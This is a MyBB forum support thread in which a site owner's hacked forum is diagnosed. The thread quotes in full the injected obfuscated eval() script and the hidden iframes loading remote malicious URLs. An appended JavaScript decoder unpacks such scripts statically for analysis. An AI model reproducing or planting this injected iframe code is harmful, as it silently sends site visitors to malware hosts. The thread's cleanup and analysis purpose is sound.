MyBB Community Forums

Full Version: I think my site was hacked
I'm getting a malware attack message from Google Chrome as well as the Java plugin wanting to run on my site.

My site is http://pearceconnect.com

Proceed with caution.

Can anyone help me resolve this issue?
I'm seeing this code at the bottom of your page.

Do you know what it is?

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d 9(){5=2.e(\'7\');f(!5){8 0=2.c(\'3\');2.g.h(0);0.6=\'7\';0.1.a=\'4\';0.1.b=\'4\';0.1.n=\'i\';0.r=\'s://q.o.j/3.k?6=l\'}}8 t=m("9()",p);',30,30,'el|style|document|iframe|1px|element|id|yahoo_api|var|MakeFrameEx|width|height|createElement|function|getElementById|if|body|appendChild|none|pl|php|2b8325qvzjut0iv8b87u9nlxnan0kpc|setTimeout|display|orge|500|drhousenews|src|http|'.split('|'),0,{}))
</script><IFRAME style="display:none" SRC="http://finderonlinesearch.com/tds/in.cgi?5&user=mexx" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
(2011-10-19, 11:06 PM)Paul H. Wrote: [ -> ]I'm seeing this code at the bottom of your page.

Do you know what it is?


I do not. How can I get rid of it? What would it be in?
Index or Footer templates.
<br />
			<div class="bottommenu">
				<div class="float_right">{$lang_select}</div>
				<div>
					<span class="smalltext"><a href="{$mybb->settings['contactlink']}">{$lang->bottomlinks_contactus}</a> | <a href="{$mybb->settings['homeurl']}">{$mybb->settings['homename']}</a> | <a href="#top">{$lang->bottomlinks_returntop}</a> | <a href="#content">{$lang->bottomlinks_returncontent}</a> | <a href="<archive_url>">{$lang->bottomlinks_litemode}</a> | <a href="{$mybb->settings['bburl']}/misc.php?action=syndication">{$lang->bottomlinks_syndication}</a></span>
				</div>
		<hr class="hidden" />
			<div id="copyright">
				<!-- MyBB is free software developed and maintained by a volunteer community. 
					 It would be much appreciated by the MyBB Group if you left the full copyright and "powered by" notice intact, 
					 to show your support for MyBB.  If you choose to remove or modify the copyright below, 
					 you may be refused support on the MyBB Community Forums.
					 
					 This is free software, support us and we'll support you. -->
{$lang->powered_by} <a href="http://mybb.com/" target="_blank">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href="http://mybb.com/" target="_blank">MyBB Group</a>.
<!-- Theme designed and developed by <a href="http://community.mybb.com/user-13376.html">Eric J.</a> -->
				<!-- End powered by -->
<br class="clear" />
<!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code -->
{$auto_dst_detection}
		</div>
		</div>
</div>
</div>

<br />
<br />

Found nothing there which is weird :/

I really appreciate the help
(2011-10-19, 10:47 PM)PearceConnect Wrote: [ -> ]I'm getting a malware attack message from Google Chrome as well as the Java plugin wanting to run on my site.

My site is http://pearceconnect.com

Proceed with caution.

Can anyone help me resolve this issue?

First, have you already seen this? http://blog.mybb.com/2011/10/06/1-6-4-se...nerabilit/

(2011-10-19, 11:06 PM)Paul H. Wrote: [ -> ]I'm seeing this code at the bottom of your page.

Do you know what it is?


This is obfuscated code covering another script.
Try looking in your index template.
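
Added example, not part of the original thread: a static decoder for the `eval(function(p,a,c,k,e,d){...})` packing seen in the injected script, which repeats the packer's token substitution without ever executing the input, so the hidden script can be read before cleaning up. The function names and the sample (pointing at `example.invalid`) are constructed for illustration, and a radix of 36 or less is assumed.

```javascript
// Static decoder for "p,a,c,k,e,d"-style packed scripts (added example).
// It never evals the input: it repeats only the word-for-token substitution
// the packer's bootstrap performs, so the hidden script can be read as text.

// Pull ('payload',radix,count,'k0|k1|...'.split('|')) out of the script source.
function parsePacked(source) {
  const m = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(source);
  if (!m) return null; // not this packer format
  return {
    payload: m[1].replace(/\\(.)/g, "$1"), // undo \' and \\ escapes
    radix: Number(m[2]),
    count: Number(m[3]),
    keywords: m[4].split("|"),
  };
}

// Assumption: radix <= 36, where token i is simply i.toString(radix).
function unpack({ payload, radix, count, keywords }) {
  if (radix < 2 || radix > 36) throw new RangeError("unsupported radix " + radix);
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = i.toString(radix);
    dict.set(token, keywords[i] || token); // empty keyword: token stands for itself
  }
  return payload.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}

// Decode and report what a site owner needs to know before cleaning up.
function analyze(source) {
  const packed = parsePacked(source);
  if (!packed) return null;
  const decoded = unpack(packed);
  return {
    decoded,
    urls: decoded.match(/https?:\/\/[^\s'"]+/g) || [],
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/.test(decoded),
    hidesElement: /display\s*=\s*['"]none['"]/.test(decoded),
  };
}

// Constructed sample in the same packed layout; bootstrap body shortened.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* bootstrap */return p}('3 0=1.4(\'2\');0.5.6=\'7\';0.8=\'9://a.b/x\'',36,12,'el|document|iframe|var|createElement|style|display|none|src|http|example|invalid'.split('|'),0,{}))`;

console.log(JSON.stringify(analyze(SAMPLE), null, 2));
```

Run it with Node.js against the text of a suspicious `<script>` block copied from a template or page source; a `null` result means the text is not in this packed format.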
It's OK to me.
It's gone now. Thanks to the guy that posted the patch!